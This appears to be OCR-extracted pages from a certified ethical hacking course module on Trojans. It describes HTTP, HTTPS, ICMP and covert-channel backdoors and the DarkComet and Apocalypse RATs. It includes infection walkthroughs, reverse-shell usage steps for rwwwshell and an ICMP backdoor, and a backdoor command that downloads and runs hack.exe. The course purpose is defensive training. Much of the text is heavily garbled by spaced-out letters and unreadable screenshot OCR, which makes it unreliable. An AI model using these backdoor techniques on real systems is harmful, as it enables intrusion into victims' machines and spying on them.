C re a te s n e w fo ld e rs o n th e s y s te m
M o d u le 0 6 P ag e 8 94
9
T h is p r o c e s s d e l e t e s o t h e r p r o c e s s e s f r o m a d i s k
0
T h e p r o c e s s h o o k s c o d e i n t o all r u n n i n g p r o c e s s e s , w h i c h c o u l d a l l o w i t t o t a k e c o n t r o l
o f th e s y s te m o r re c o rd k e y b o a rd in p u t, m o u s e a c tiv ity , a n d scre e n c o n te n ts
R e g is t e r s a D y n a m i c L in k L i b r a r y File
W in V N C
V N C S te a le r
WinVNC: Current User Properties
Incoming Connections
OK
f? Accept Socket Connections
Cancel
Display Number: [~
Apply
Password:
P Accept CQR8A Connect**‫׳‬.-.
r~
Disable Remote Keyboard & Pornter
T Disable Local Keyboard i Ponte*
Update Hanting
r
n
Pol Ful Screen
P Pol Foreground Window
1“
Pol Console
Windows Only
T
PolWndow Under Cusor
FIGURE 6.23: Screenshots showing WinVNC and VNC Stealer
M o d u le 0 6 P ag e 8 95
CEH
H T T P /H T T P S T ro jan s
T h e c h ild p ro g ra m
a p p e a rs to be a u s e r to
th e fire w a ll so it is
Spawn
HTTP T ro ja n s
a llo w e d to access
can bypass any
th e In te rn e t
fire w a ll a nd w o rk in
th e re ve rse w a y o f a
W
T h e y are
e x e c u te d o n th e
s tra ig h t HTTP tu n n e l
/
in te rn a l h o s t and
sp aw n a c h ild a t a
p re d e te rm in e d tim e
^
HTTP request
to download a file
Trojan passes through
Copyright © by
H T T P /H T T P S
EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
T r o ja n s
H T T P /H T T P S T r o j a n s c a n b y p a s s a n y f i r e w a l l , a n d w o r k in t h e r e v e r s e w a y o f a s t r a i g h t
H TTP t u n n e l . T h e y u s e w e b - b a s e d i n t e r f a c e s a n d p o r t 8 0 . T h e s e T r o j a n s a r e e x e c u t e d o n t h e
in te r n a l h o s t a n d s p a w n a c h ild e v e r y d a y a t a c e r ta in tim e . T h e c h ild p r o g r a m a p p e a rs t o be a
ta rg e t to
p ro g ra m
th e fire w a ll w h ic h ,
in t u r n , a l l o w s i t t o
access th e
In te rn e t.
H o w e v e r , t h i s c h i ld
e x e c u t e s a l o c a l s h e l l, c o n n e c t s t o t h e w e b s e r v e r t h a t t h e a t t a c k e r o w n s o n t h e
I n t e r n e t t h r o u g h a l e g i t i m a t e - l o o k i n g H TTP r e q u e s t , a n d s e n d s i t a r e a d y s ig n a l. T h e l e g i t i m a t e l o o k i n g a n s w e r f r o m t h e a t t a c k e r ' s w e b s e r v e r is in r e a l i t y a s e r i e s o f c o m m a n d s t h a t t h e c h i ld
c a n e x e c u t e o n t h e m a c h i n e ' s l o c a l s h e ll. A ll t r a f f i c is c o n v e r t e d i n t o a B a s e 6 4 - l i k e s t r u c t u r e a n d
g i v e n as a v a l u e f o r a c g i - s t r i n g , so t h e
a tt a c k e r can a v o id d e te c tio n . T h e fo llo w in g
is an
e x a m p le o f a c o n n e c tio n :
S la v e : G E T / c g i - b i n / o r d e r ?
M 5 m A e jT g Z d g Y O d g lO O B q F fV Y T g jF L d g x E d b lH e 7 k rj
H T T P /1 .0
M a s t e r re p lie s w i t h : g S m A lf b k n z
T h e GE T o f t h e i n t e r n a l h o s t (SLAVE) is j u s t t h e c o m m a n d p r o m p t o f t h e s h e l l ; t h e a n s w e r is a n
e n c o d e d " I s " c o m m a n d f r o m t h e a t t a c k e r o n t h e e x t e r n a l s e r v e r (M A S T E R ). T h e SLAVE t r i e s t o
c o n n e c t d a i l y a t a s p e c i f i e d t i m e t o t h e M A S T E R . If n e e d e d , t h e c h i l d is s p a w n e d b e c a u s e i f t h e
sh e ll ha n g s, t h e a t t a c k e r can c h e c k a n d fix it t h e
n e x t d a y . In c a s e t h e a d m i n i s t r a t o r se e s
c o n n e c tio n s t o th e a tta c k e r 's s e r v e r a n d c o n n e c ts it t o h im s e lf, th e a d m i n is t r a t o r j u s t sees a
M o d u le 0 6 P ag e 8 96
b r o k e n w e b s e r v e r b e c a u s e t h e r e is a t o k e n ( p a s s w o r d ) in t h e e n c o d e d cgi GE T r e q u e s t . W W W
p r o x i e s (e .g ., s q u i d , a f u l l - f e a t u r e d w e b p r o x y c a c h e l ) a r e s u p p o r t e d . T h e p r o g r a m m a s k s its
n a m e in t h e
p r o c e s s l is t in g . T h e p r o g r a m s a r e r e a s o n a b l y s m a l l w i t h t h e
p ro g r a m s , ju s t 2 6 0 -lin e s
p e r file .
Usage
is e a s y : e d i t
m a s t e r a n d s la v e
rw w w s h e ll.p l fo r th e
c o r r e c t v a lu e s ,
e x e c u t e " r w w w s h e l l . p l s l a v e " o n t h e SLAVE, a n d r u n " r w w w s h e l l . p l " o n t h e M A S T E R j u s t b e f o r e
i t is t h e t i m e a t w h i c h t h e s la v e t r i e s t o c o n n e c t .
FIGURE 6.24: Victim's system infected w ith HTTP Trojans
M o d u le 0 6 P ag e 8 97
HTTP Trojan: HTTP RAT
Infect th e v ic tim 's c o m p u te r w ith
s e r v e r . e x e a n d p la n t HTTP T ro jan
Th e T ro ja n sen ds an e m ail
w ith th e lo c a tio n o f an IP a d dre ss
C o n n e ct t o th e IP ad dre ss
u sin g a b ro w se r to p o rt 80
e
Displays ads, records personal
data/keystrokes
»
Downloads unsolicited files, disables
program s/system
©
Floods In te rn e t connection, and
distributes threats
© Tracks brow sing a ctivities and hijacks
In te rn e t brow ser
6
Makes fra u d ule nt claims about spyware
dete ction and removal
Copyright © by
H T T P
T r o ja n :
H T T P
EG-GMMCil. All
Rights Reserved. Reproduction is Strictly Prohibited.
R A T
RATs a r e m a l i c i o u s p r o g r a m s t h a t r u n i n v i s i b l y o n h o s t PCs a n d p e r m i t a n i n t r u d e r
r e m o t e a c c e s s a n d c o n t r o l . A R AT c a n p r o v i d e a b a c k d o o r f o r a d m i n i s t r a t i v e c o n t r o l o v e r t h e
t a r g e t c o m p u t e r . O n c e t h e t a r g e t s y s t e m is c o m p r o m i s e d , t h e a t t a c k e r c a n u s e i t t o d i s t r i b u t e
RATs t o o t h e r v u l n e r a b l e c o m p u t e r s a n d e s t a b l i s h a b o t n e t . T h e R A T e n a b l e s a d m i n i s t r a t i v e
c o n t r o l a n d m a k e s i t p o s s i b l e f o r t h e a t t a c k e r t o w a t c h a ll t h e t a r g e t ' s a c t i o n s u s i n g k e y l o g g e r s
o r a n y o t h e r s p y w a r e s . A n a t t a c k e r c a n a ls o i m p l e m e n t c r e d i t c a r d f r a u d , i d e n t i t y t h e f t u s i n g
c o n fid e n tia l
in fo rm a tio n ,
and
can
re m o te ly
access w e b
cam s
and
v id e o
re c o r d in g s , ta k e
s c r e e n s h o t s , f o r m a t d r i v e s , a n d d e l e t e , d o w n l o a d , a n d a l t e r f i l e s . It c a n ' t b e d e t e c t e d as it
w o r k s l ik e g e n u i n e p r o g r a m s a n d it is n o t e a s i ly n o t i c e d .
M o d u le 0 6 P ag e 8 98
□
HTTP RAT 0.31
In fe c t th e v ic tim 's c o m p u te r w ith
r 'r X M T T P R A T
•
s e r v e r . exe and
b J i I x k k d o o r W e b s e rv e r
/ b y zOmbie
vfl.31
<*>
KM x r n lM
The T ro ja n sends an e m a il
w ith th e lo c a tio n o f an IP address
iW ngi
& tend noM1c*hon wtfh p •ddrett 10 rnal
©
SMTP t a w 4 serving mat
u c4n specrfy t«v«4l s « w t detntfod Mrih .
IBSHSBSS8SS9-----yo u « m d « tt* 1s
fyou0madco‫״‬n
P cteeF w W A
p la n t HTTP T ro ja n
<2>
C o nnect t o th e IP address
using a b ro w s e r to p o r t 80
V ictim
t»ve»portf86
A
G e n e ra te s |
s e rv e r .exe :
using HTTP RAT :
w » k o m » 2 HTTP_RAT in fected com p uter >:]
« I'ynrwgmtiiM l
r t i h i■ 1 » « l
m hi. m 1 »nn■ m l
Attacker
FIGURE 6.25: Attacker infecting Victim's system using HTTP RAT
M o d u le 0 6 P ag e 8 99
Shttpd Trojan - HTTPS (SSL)
CEH
0
0
J
J
SHTTPD is a small HTTP Server that can be em bedded inside any
program
It can be wrapped with a genuine program (game c h e s s . e x e ) , when
executed it will turn a com puter into an invisible web server
0
0
N orm ally Firew all allow s
A tta c k e r
Encrypted Traffic
you thro u g h p o rt 443
V ic tim
IP: 1 0.0 .0 .8 :4 4 3
IP: 1 0.0 .0 .5 :4 4 3
C o n n e ct to th e v ic tim using W e b B ro w se r
In fe c t th e v ic tim 's c o m p u te r w ith c h e s s . e x e
h t t p : / / 1 0 . 0 . 0 .5 :4 4 3
S h t t p d s h o u ld be ru n n in g in th e b ac k g ro u n d
lis te n in g o n p o r t 443 (SSL)
Copyright © by
S h ttp d
T r o ja n
- H T T P S
(S S L )
D -fr-a
S h t t p d is a s m a l l H T T P s e r v e r t h a t c a n e a s i ly b e e m b e d d e d i n s i d e a n y p r o g r a m . C ++
s o u r c e c o d e is p r o v i d e d . E v e n t h o u g h s h t t p d is n o t a T r o j a n , i t c a n e a s i ly b e w r a p p e d w i t h a
c h e s s .e x e file a n d it can t u r n a c o m p u t e r in t o an in v is ib le w e b s e rv e r.
0
In fe c t th e t a r g e t 's c o m p u t e r w it h che ss.e xe .
0
S h t t p d s h o u l d b e r u n n i n g in t h e b a c k g r o u n d l i s t e n i n g o n p o r t 4 4 3 (SSL).
9
C o n n e c t t o t h e t a r g e t u sin g a w e b b r o w s e r : h t t p : / / 1 0 . 0 . 0 . 5 : 4 4 3 .
N o rm a lly F ire w a ll a llo w s
A tta c k e r
yo u th ro u g h p o r t 4 4 3
6
-
E n c ry p te d T ra ffic
V ic tim
IP: 10.0.0.8:443
IP: 10.0.0.5:443
Connect to th e v ic tim using W eb Brow ser
Infect th e victim 's co m p u te r w ith c h e s s . e x e
http://10.0.0.5:4 43
S h t t p d should be ru n ning in th e background
liste nin g on p o rt 44 3 (SSL)
FIGURE 6.26: Attacker infecting Victim 's system using Shttpd Trojan
M o d u le 0 6 Page 9 0 0
IC M P T u n n e lin g
J
C o v e r t c h a n n e ls a re m e th o d s in w h ic h a n a tta c k e r c a n h id e t h e d a ta in a p r o t o c o l
t h a t is u n d e te c ta b le
J
4 7 )
T h e y r e ly o n te c h n iq u e s c a lle d t u n n e lin g , w h ic h a llo w o n e p r o t o c o l t o b e c a r r ie d
V
o v e r a n o th e r p ro to c o l
J
IC M P t u n n e lin g u ses IC M P e c h o - r e q u e s t a n d r e p ly t o c a r r y a p a y lo a d a n d
s te a lt h ily a c c e s s o r c o n t r o l t h e v ic tim 's m a c h in e
‫ן‬
ICMP Client
ICMP Server
IC M P T r o ja n :
ic m p s e n d
(C o m m a n d :
(C o m m a n d :
icmpsend < victim IP>)
&
icmpsrv - i n s t a l l )
0 ‫־‬
C:\Documents and Sett»>gs\Adm1n1strat0f.VIND0WS\Deskt0p\l
CMP Backdoor Wln32>1cmp
S en d 127 0 0 1
—( ICMP-Cmd vl.O b e ta, b y Q xisone ]—
- i E-mail:
fla1sQ nttthQ tm i1l.com I —{
2012/B/15 1—
U sage: ic m p se n d R em otelP
CtrHC o r Q/q to Q uite
H/h fo r help
1c1ap-caco>H
[h ttp ://127.0.0.1/hack.exe =a d m in exe] *D ow nload Files. P arth is Msystem
32>
[psltst]
<Lrst th e P ro c ess>
[pski■ ID]
<Ki■ th e P ro c ess>
C om m an d
< ran th e c o m n u n d >
C:\Docunwnts and Settilngs\Admlnlstrator.VINDOWS\Desktop\ICMP
Backdoor Wln32>kmp
Commands
are sent using
ICMP protocol
—{
ICMP-Cmd vl.O beta, by gxlsone
}—
b~
-i
2012/»/15
Usage: kmpsrv -install <to Inst•■ service>
kmpsrv -remove <to remove service>
Transmitting File _ Success I
Creating Servic• _ Success I
Starting Service - Pending _ Success I
C:\Documents and SettingsVWmlnistrator.VINOOWS\DesfctopVlCMP Backdoor
Win32
Cbpyright © by EC-CMICil. All Rights Jte$ervfe<t;Reproduction is Strictly Prohibited.
I C M
P
T u n n e lin g
T h e c o n c e p t o f IC M P t u n n e l i n g is s i m p l e s i n c e a r b i t r a r y i n f o r m a t i o n t u n n e l i n g in t h e
d a ta
p o rtio n
o f IC M P _ E C H O a n d
IC M P _ E C H O R E P L Y p a c k e t s
is p o s s i b le .
IC M P _E C H O tr a f f ic
c o n ta in s a c o v e r t c h a n n e l t h a t can be d e s tr o y e d d u e t o tu n n e lin g . N e tw o r k d e v ic e s d o n o t f ilt e r
th e c o n te n ts o f IC M P _ E C H 0 tr a ffic , m a k in g th e use o f th is c h a n n e l a tt r a c t iv e t o h a ckers.
A t t a c k e r s s i m p l y pa ss t h e m , d r o p t h e m , o r r e t u r n t h e m . T h e T r o j a n p a c k e t s t h e m s e l v e s a r e
m a s q u e ra d in g
as c o m m o n
IC M P _E C H O
tra ffic .
The
p a c k e ts
can
e n c a p s u la te
(tu n n e l)
any
re q u ire d in fo rm a tio n .
C o v e r t c h a n n e l s a r e m e t h o d s in w h i c h
an a tta c k e r can h id e th e
d a ta
in a p r o t o c o l t h a t is
u n d e te c t a b le . T h e y re ly o n te c h n iq u e s c a lle d tu n n e lin g , w h ic h a llo w o n e p r o t o c o l t o be c a rr ie d
o v e r a n o t h e r p r o t o c o l . A c o v e r t c h a n n e l is d e f i n e d as a v e s s e l t h r o u g h w h i c h t h e i n f o r m a t i o n
c a n p as s, a n d i t is g e n e r a l l y n o t u s e d f o r i n f o r m a t i o n e x c h a n g e s . T h e r e f o r e , c o v e r t c h a n n e l s
c a n n o t be d e te c t e d b y u s in g s ta n d a r d s y s te m s e c u r ity m e th o d s . A n y p ro c e s s o r b it o f d a ta can
b e a c o v e r t c h a n n e l . T h is m a k e s i t a n a t t r a c t i v e m o d e o f t r a n s m i s s i o n f o r a T r o j a n , s i n c e an
a t t a c k e r can use t h e c o v e r t c h a n n e l t o in s ta ll t h e b a c k d o o r o n t h e t a r g e t m a c h in e .
M o d u le 0 6 P ag e 9 01
ICMP Client
(Command:
ic m p s e n d C v ic tim
ICMP Server
IC M P T r o ja n :
ic m p s e n d
ip
(Command:
ic m p s rv - i n s t a l l )
>)
Command Prompt
Command Prompt
C :\D o c u m en ts an d S«ttlngs\A dm lnistrator.V IN D O W S \D esktop\l
CMP B a c k d o o r W in32>icm p
Send 127.0.0.1
=====w«ico«ne to ww>v.hachgrxfil*s.n«======
—[ ICMP-Cmd v1 0 beta, by gxisone J—
—{E-mail:
qxisone@hotmail com ]—
—C
2012/8/15]—
Usage: icmpsend RemotelP
Ctrl+C or Q/q to Quite
H/h for help
ICMP-CMD>H
[http://127.0.0.1/hack.exe =admin.exe] <Download Files. Parth is Wsystem
32>
[pslist]
<List th e Process>
[pskill ID]
<Kill the Process>
Command <r u n th e com man d>
ICMP-CMD
C om m ands
C:\Documents and Settiings\Admini3trator.VVJDOWS\De9ktop\ICMP
Backdoor Win32>icmp
Srv -install
a re s e n t using
—
ICM P p ro to c o l
—[
—[
—{
- W e lc o m e to w w w .h a t kerxf ile s.n e t————
ICM P-Cmdvl.O b e ta , b y g x iso n e
F-mdil: gxisone @ hotm a il.com
2012/8/15
]—
]—
J—
Usage: Icm p srv-in sta ll <to install service>
Icm p s rv -re m ove < to rem ove service>
T ransm itting F ile ‫ ״‬. Success!
Creating Service Success I
starting Service... Pending... success!
c:\D oajm en tsan dS ettin gs\A dm inistrator.viN D 0 W b \D esktop \1C M ’ Backdoor
FIGURE 6.27: ICMP Tunneling
M o d u le 0 6 P ag e 9 0 2
R em ote Access T ro jan s
CEH
1 1 1
Attacker gains 100% I________
(complete) access
to the system __________
Rebecca Victim
In fe cte d w ith RAT T ro jan
J
J
This Trojan works like a remote desktop
access
1.
Hacker gains complete GUI access to the
remote system
2.
In fe c t (Rebecca's) c o m p u te r w ith s e rver.exe
and p la n t Reverse C o n n e c tin g Trojan
The Tro jan c o n n e c ts to P o rt 80 to th e
a tta c k e r in Russia e s ta b lis h in g a reverse
c o n n e c tio n
3.
Jason, th e atta cke r, has c o m p le te c o n tro l
o v e r Rebecca's m a ch in e
R e m o te
1—1
—
A c c e s s
T r o ja n s
R e m o te access T ro ja n s p ro v id e fu ll c o n t r o l o v e r th e t a r g e t 's s y s te m t o a tta c k e rs and
e n a b l e s t h e m t o r e m o t e l y a c c e s s f i l e s , p r i v a t e c o n v e r s a t i o n s , a c c o u n t i n g d a t a , a n d s o o n in t h e
t a r g e t ' s m a c h i n e . T h e r e m o t e a c c e s s T r o j a n a c ts as a s e r v e r , a n d l i s t e n s o n a p o r t t h a t is n o t
s u p p o s e d t o b e a v a i l a b l e t o I n t e r n e t a t t a c k e r s . T h e r e f o r e , i f t h e t a r g e t is b e h i n d a f i r e w a l l o n
t h e n e t w o r k , t h e r e is less c h a n c e t h a t a r e m o t e a t t a c k e r w o u l d
T ro ja n . A tta c k e rs
on
th e
sam e
n e tw o rk
lo c a te d
b e h in d
th e
be a b le t o c o n n e c t t o th e
fire w a ll
can
e a s i ly a c c e s s t h e
T ro ja n s .
E x a m p le s in c lu d e t h e B a c k O r ific e a n d N e tB u s T ro ja n s . A n o t h e r e x a m p le , th e B u g b e a r v iru s
t h a t h i t t h e I n t e r n e t in S e p t e m b e r 2 0 0 2 , i n s t a l l e d a T r o j a n h o r s e o n t a r g e t s ' s y s t e m s , g i v i n g
access t o s e n s itiv e d a ta t o th e r e m o te a tta c k e rs .
T h is T r o j a n w o r k s lik e a r e m o t e d e s k t o p a c c e s s . T h e a t t a c k e r g a i n s c o m p l e t e G U I a c c e s s t o t h e
r e m o te s y s te m .
T h e p r o c e s s is as as f o l l o w s :
1.
I n f e c t s ( R e b e c c a 's ) c o m p u t e r w i t h s e r v e r . e x e a n d p l a n t s R e v e r s e C o n n e c t i n g T r o j a n .
2.
The
T ro ja n
c o n n e c ts
to
P o rt
80
to
th e
a tta c k e r
in
R ussia
e s ta b lis h in g
a
re ve rse
c o n n e c tio n .
M o d u le 0 6 P ag e 9 0 3
3.
J a s o n , t h e a t t a c k e r , h a s c o m p l e t e c o n t r o l o v e r R e b e c c a 's m a c h i n e .
A tta c k e r gains
100% (c o m p le te )
access
to th e system
Jason A tta c k e r
Sitting in Russia
R ebecca V ic tim
In fe c te d w ith RAT
FIGURE 6.28: Attacker infecting victim 's machine using Remote access Trojans
M o d u le 0 6 P ag e 9 04
Remote Access Trojan: RAT
DarkComet and Apocalypse
hSodi
11 1668
. 920
L 9CC
. «6C
.
132•*
1z .
E?
7>
D
Wan/Qian]: Port
MCtnwF. .
VicbmesF. .
'.!ctmesF...
YICOmesF...
•
•
-
•
-
111 1C12‫ ־‬wetwsjf. . • •
.
r c ll
138/[:92....
• 6.23/ ] 192‫״‬..
\<c&mMF. .
*ctmesF...
. :C‫«־‬
C11076 VW>m«F...
u I8C -
Uc&maaF...
& 136C
F...
ttcanesP...
.. :092
G11080
ul::J6 Mc&mttF...
■ 59/[192.1...
5.154‫־‬f [192...
♦2.43/[192...
*6.142 / [192...
27/[192.1...
136/ ] 192....
• •
150/ ] 192....
27 / ] 192.1...
• 6.28 / ] 192....
•
♦2.43 / ] 192...
• 55 / ] 192.1...
.07/[192.1...
i. 18** VKtimejF... • - m *4/ [192.16...
•I 96•* V*C0mwF... • t m .46.142 /[192...
£ :260
. ‫ ״• • י‬172/ ] 78.2...
t J :240 vCt‫־־‬n«*F...
- • Sl/[192.1...
.07/ [192.1...
u I : :23 Uc&ntlF...
moo
LSC60T-HI / C<*is3'2
0IIV2/SYSTEM
AfJTHOHYLOPSZ f 5ys...
PC-OESHCLGO/Sho...
ANTHONYLOPEZ / u * ...
SNAKE-E7D71CD4A
DIV2 / Acrr»n>itr*t*ur
PC■0CSHXEX3 / Sho...
PCOS-WOI / rxx
SNAKE137CC-PC /«* * ...
PC0 6 •ALEX / ALEX
TTANCtN / Adnrwfr« ...
L5C0OT-III / SYSTEM
DAMJEN-PC d*n*c
Windows
WW0WS
Wndov•
Window
windows
Windows
Wrtdows
Wndo/tt
Windows
Wrvkjws
Vfedow•
W*d0Ws
WHdOWS
Wndov* 9
Window S
1
If...
I
OAVIDOURS-PC / D*v.
PC-OC-AlOC /5'<S7CV
‫ יל‬v‫<־‬a7?*1
Wndo•‫י « ׳‬
‫ג‬
Trr».‫ •׳‬D»t
D
19:14c37/ : 2/03/2010
19:14•38/ : 2/03/20:0
19; 14. •‫י‬0/ : 2/03/20:0
19:14:44/12/03/2010
19:14e44/:2/03/20:0
VKQmesf... • ‫־ • • ־־‬
IP WAN/&.AN]: Pert
V1<trr«cF...
•
\k Utc5T...
' I■ •
* •
vtcomesF... ‫ * י‬- ^
VkbfnesF...
Lpdat*
•
•
tm % •
•
-
•
•.
] Status: Kt*rtng.
Copyright © by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited.
R e m o te
A c c e s s
T r o ja n :
R A T
D a r k C o m
e t a n d
A p o c a ly p s e
D a rkC o m e t
is a t o o l
th a t
a llo w s y o u
to
re m o te ly
access th e
a d m in is tra tiv e
c o n tro ls
and
p r i v i l e g e s o f a n i n f e c t e d m a c h i n e w i t h o u t t h e u s e r ' s k n o w l e d g e o r p e r m i s s i o n . It p r o v i d e s y o u
w it h access t o p ro cesse s, re g is try , c o m m a n d p ro m p ts , w e b c a m s , m ic ro p h o n e s , a p p lic a tio n s an d
can e v e n p ro v id e a k e y lo g g e r w h e n e v e r y o u use th e s y s te m .
M o d u le 0 6 P ag e 9 0 5
t D arkCom et-RAT v2j0 RC3 • U ser(s): 21
tSo*
10
IP Wan/TLar]: Port
Computer NameAHeN...
OS
A.
C
Png
1 1668
vyomwF.
‫־‬. V r ^ 5 S e s « o [7600]
VKCmuP.
•
-
S0R A r*5/Sy»t*m e
920
*•
•
K - o e - ^ A o e ./s r s T w ‫׳‬
‫א‬
X
:09 * 5
9^MJ
•
4 : .4 3 /[ l» 2 ...
X
—
•6 .1 4 2 /[1 9 2 ..
wnd»A* vot» Servic•...
.V rO>A»,«U Service...
WV d**e *P $erv<c* P ...
X
X
x
x
.m
93M*
M
M
JM O
vxem «P .
«0
111012
n»44
vkemeeF.
•
WbmesF.
v‫<־‬tme*F.
••••
.
i
2 7 /(1 9 2 .1 ...
• •
v 1924
vvomesF.
1040 v<t>mesF.
vxtm eiP.
i 1 :0 7 6
1104
* 5 9 /( 1 9 2 1 ...
‫צ‬. 164 / ] 192..•
vw
i
*i YCrntfF.
M'MO
McOmaP.
i 11240 vytimeeP.
I ■1129 VScttmeeP.
. ‫ חיי‬4
5IMT / Ad^m&atewr
X
X
x
93Mj
93M*
4781*
9C -06-5H O tE X J/»•...
XR Sert-ce P...
v/* d»»« V«t» Serv<*...
*C‫־‬C*‫־‬M O !/« >
Y‫׳‬n d > » s v«t* Service...
X
x
:33Vs
719s
k « 1 • 5 5 /1 1 9 2 1 ...
S*iA^ 13700^0 / *‫י׳‬# ...
v.vtd>.\5$e%«n [7600]
X
79Mj
153 Is
•
v!nd»!A5 v«t» Se%‫>־‬ce...
X
X
x
63M5
3415
DIDIER RIOLCCXRT...
I71M*
36305
SRO.Oent
X
x
93MS
x
:72M»
07*■ ‫א‬Mf
52305
05
Lacre « ^ « » V y e ( . ■ .
0•
Total Conmander 7.50...
X
76*01•
A1«
< 2 .4 3 /[1 9 2 ...
•
•
. 0 7 /( 1 9 2 1 ...
»C‫־‬0 6 ‫ ^־‬£ X / Al£X
4 4 / [192.16...
TITANnx / Ad‫־‬Tr**fa...
$ .1 4 2 /[1 9 2 ...
. S080T-m /SYST & ‫׳‬
5AV« > ‫ ־‬PC .'darver
•
-
«
«
•
■
‫• ־‬
% s 1 /( 1 0 3 .1 ...
107 / ) 1 9 2 1 ...
1 7 2 /[7 8 .2 ...
mm
mtm e>0 / ‫•ח‬
DAVEKXftS*>C ‫ י ^ ם‬...
1
Servce P...
v.ndÂ i x? Ser.-ce P...
X
v.'nd»A-sSe%en [ 6 0 0 ‫]יל‬
X
v.‫־‬nd»A< v‫׳‬st» Se>%^ce...
W>wW<YQ<«n«« C
Tint/D ot•
ID
IPWAN/ILAN]:P0rt
19: 14:37/12/03/2010
V*tt‫׳‬n « F ...
•
19: 14:38/12/03/2010
V<tmesF...
• . • • ‫י‬
k ^
19:14:40/12/03/2010
19:14:44/12/03/2010
V<tmesF...
v m m • # ...
19:1444/12/03/2010
1e814:a4/1?inv3ft1n
Etkt Server
Q SendOrder*
_
u x ia te
a
*
‫— ►״‬
x
81s
142*
15456•
:25MS
V
avast1 • Avertssemeot
____ ‫__״‬
A ctve Cap&on
-
m
‫־‬
•
- -
VXtmcaP...
‫־‬
____ a
X
V‘nd»»?Se-.«n [7600]
9C-06‫־‬A^X / SYSTS4
‫ ^ יל‬a ,r oja a 0
‫•־‬
1
Wrdynsx?
1
*cton
‫ נ‬0‫י״‬
Prog‫׳‬am
173N1
360M*
47MJ
i*”
k ^
4
340365
1S455*
X
1 5 0 /[1 9 2 ....
-
564
4730*
X
• 6 .2 8 /1 1 9 2 ...
1 3 6 /[1 9 2 ....
«
•
1 11116 vxtnesF .
1844
VOmesP.
5274*
78Ms
343NS
\MndbwsSeMn [7600]
V‫־״‬rx»A5X PS«r,ice P...
•
* > 2 7 /[1 9 2 1 ...
-5.28 / [192—
mesf.
X
X
*
6 9 ilS
8747*
ANTH0hYL0P€2/utl...
SNACE-C7071C04A/|...
‫׳‬
•
.1 1092 W bm esf.
1 1 :0 8 0
.VrxS>.S XP Ser.-ce P...
X
0.
v.y!d»‫־‬A «Se.«n [7600]
Wndovvs v«sta Serve*...
VKOmejP.
V<6m«P.
. 1340
1
. SO«OT-ra , Cae* 3 ‫־‬C
DIM 2/SO T M
Active Captxn
A N TV O 1U 0PK /Sy*...
PC-0e-& <XEX3/Sh>...
‫־‬
•
1 3 6 /[1 9 2 ....
^C-OC-MOI/SYSTCV
:at
21294s
DIUIERRI0UC0URT < » • ■•*8hotmoi.com >
- : >*90
34»
m
mm
M i —
_
W O .O en t
I j : 3490
1 * r e <m/ »•*> ^•®notma<.fr>
Total Commander 7.50 pubfc be‫־‬.o 6 •M»d elMetth...
90*3 : [ 2‫״‬
1
; 3490
: ‫ריג־<ד‬
Statu* ! letern g...
N‫ ״‬Ooan Pert(•)
'
■
1
FIGURE 6.29: RAT DarkComet Screenshot
A p o c a l y p s e R e m o t e A c c e s s T r o j a n is a t o o l t h a t a l l o w s y o u t o m o d i f y t h e e n t i r e r e g i s t r y a n d
a l l o w .dl f i l e s t o r u n e x e c u t a b l e s . T h is r u n s in i n v i s i b l e m o d e w h e n i t is e x e c u t e d .
Apocalypse Remote Administration Tool v l.4 .4 - 1 Victim Online
~
A Corrections Brooded .j Settngs / BuWc >e* SUtsbcs
S 0 Irformabon
Server©
f| P
CWormabon
0 ^«P0crfypse_8C9C6515
Server Wormabon
? *Instaled Af**rat>ar
ActivePorts ><
a 5) Accessories
RemoteOesttop 41
WebcamCapture ■4
‫ >י‬AucfcoCapture
‫ י־‬:ajKeylogger
Orfcie Keylogger
Offtne Keytogget
I Commsacetion*
*
8
0
0
Jp Owl wth Server
Sand Message
B ^Menegars
r
4
0
B* Ptjgns
Password Manager
F^Shif *4
a O Contact 01
£ webS-te
I About
Wan
I274XO.I
^ Message Hoi Server D apOcatypse 8C9C6b1b
19
Computer Name Username
KC 273FF53A... Harters
127 0 .0 .1 9 127.0.0.1
U
X
M« * «Bo . Uniag- Lai
Message Icon
□
©
®OK
O y m . no
C ' Rw‫־‬y Cancol
0 « C 4 rc ^
O Y « No Cw col
O t t o ■ R r ty I g n c .
M w iilim ■
3
Me Manegtr
Ne Search
Remote Oowrioed
Pegnt/y Edtor
Opboerd Manager
Clpboerd Text
fie ClpboerdFits
O St rtvo Manager
Service Manager
Process Manager
ModJes
“‫ ־ל‬WindowManager
CommandPrompt ■
O Explorer Settngs
S
‫ ל‬About
Imtalled Applications Server V : *pOcdlyptc BC9C6b1b
DisplayName
Version
O Adobe AIR
j AlchemyRemote £>ecutor
-‫ ל‬update for Wndcwrs (10911IM( 1
)3.6.0(erHJS
SQlyog TrW8.5S
Adobe Systems Inc
*J Adobe Rtadar 9.3.3
f T if &
*
01 4
9.S0.7S23” ■
9.3.3
C:\PtogramF4es\Mu«a F.al
WabyogSoftworfePvt.Ud. C\P»o*amHes\SQlyog Trv
RomanBourdon(Rotes)
*c:\»‫*־‬ampVrmsOOOexe’
CAGETectnoloees
C:\P gramHes\wmPc«*u
C:\Pro*amHes\w*RAAUs
*crosoft Corporation
Adobe Systems Incorpora... MsCxec.exe/I{AC766AB6-7
M1*r0f AM n«l04?77Ml%
0
rwtale^ppkahor^êcerê^
FIGURE 6.30: Apocalypse Screenshot
0
Mi!eFre# ■(3.6.0)
) 55
10
NoComecbon'
M o d u le 0 6 P ag e 9 0 6
2.0.3.13070
IMh
4.1.0-2001
,HAiWwAft‫׳‬
HO 0.1
UnnstelStmg
c:\ProgramFies\C i monF
*C:\P»oâmFtesVAkhemyR
Ncroeoft Corporation
CT wrPAR »ct#m
jWetWAsXP
1)1 0 0 t
‫ וחל‬%17n1
C o v e rt C h a n n e l T ro ja n : C C T T
C EH
J
Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques,
creating a rb itra ry data transfe r channels in the data streams authorized by a netw ork access
control system
J
It enables attackers to get an external server shell from w ith in the internal netw ork and viceversa
J
It sets a TCP/UDP/HTTP CONNECT | POST channel allow ing TCP data streams (SSH, SMTP, POP,
etc...) between an external server and a box from w ith in the internal netw ork
CCTT
C lie n t
P ro x y C h ain
S e rv e r
Copyright O by EG-Gtuncil. All Rights Reserved. Reproduction is Strictly Prohibited
C o v e r t C h a n n e l T r o ja n :
C C T T
T h e C o v e r t C h a n n e l T u n n e l i n g T o o l is a h i d d e n c h a n n e l t o o l . It p r o v i d e s y o u w i t h
